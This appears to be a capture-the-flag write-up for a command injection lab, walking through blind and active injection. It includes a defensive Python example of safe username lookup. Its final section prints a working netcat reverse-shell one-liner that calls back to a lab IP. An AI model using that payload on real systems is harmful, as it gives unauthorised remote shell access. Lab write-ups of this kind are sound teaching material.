Injection

Last updated 3 years ago

An introduction to Command Injection

Blind Command Injection

Let's go to the webpage.

Let's try to find the kernel version, redirect it to a file, and then read the file.

Now let's enter root and look at the response for the answer to the next question.

Now let's enter www-data.

Let's enter our name and see what the output is.
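From the defender's side, a username lookup like the one this form performs does not need a shell at all. The following is an added example, not code from the room or from this writeup: `lookup_user`, `run_with_argv` and the sample passwd data are assumptions made for illustration. It validates the name against an allowlist, parses passwd-format text directly, and shows that a value passed as a single argv element reaches the child process as literal text.

```python
import re
import subprocess
import sys

# Constructed sample data in /etc/passwd format (not taken from the room's machine).
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
"""

# Allowlist for login names: lowercase start, then up to 31 safe characters.
USERNAME_RE = re.compile(r"[a-z_][a-z0-9_-]{0,31}")


def lookup_user(username, passwd_text=SAMPLE_PASSWD):
    """Return the passwd fields for username, or None. No shell is involved."""
    if not USERNAME_RE.fullmatch(username):
        raise ValueError("invalid username")
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) == 7 and fields[0] == username:
            return {"name": fields[0], "uid": int(fields[2]), "shell": fields[6]}
    return None


def run_with_argv(value):
    """Pass value to a child process as one argv element (shell=False)."""
    # The child only writes back the argument it received.
    child = [sys.executable, "-c", "import sys; sys.stdout.write(sys.argv[1])", value]
    done = subprocess.run(child, capture_output=True, text=True, check=True)
    return done.stdout


if __name__ == "__main__":
    print(lookup_user("www-data"))
    # Separators and pipes stay literal text because no shell parses them.
    print(repr(run_with_argv("root; id | cat")))
    try:
        lookup_user("root; id")
    except ValueError as exc:
        print("rejected:", exc)
```

The allowlist is the first line of defence; the argument-list call matters for the cases where an external program really has to be run with user-supplied data.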

Active Command Injection

Let's go to the webpage that they mention.

Let's look at the files with the ls command and see if there is an interesting file.

There is an interesting file.

To see how many users there are on the machine, we can read the /etc/passwd file.

We can look at this output by viewing the page's source code.

We can see which user the app is running as with the whoami command.

We can see what this user's shell is set to in the /etc/passwd file.

We can see what version of Ubuntu is running by using the command lsb_release -a.

We can print out the MOTD with this command.

Get the Flag!

Let's first get a reverse shell on the machine so that we can navigate through it more easily.

First, we start a netcat listener.

Now we use the reverse shell command:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.13.8.64 1234 >/tmp/f

Let's hit Submit.

We have a shell; let's stabilize it.

Now let's look for the flag. It might be a txt file and may be called flag, so let's look for that:

find / -type f -name flag.txt 2>/dev/null

We have the flag; let's read it.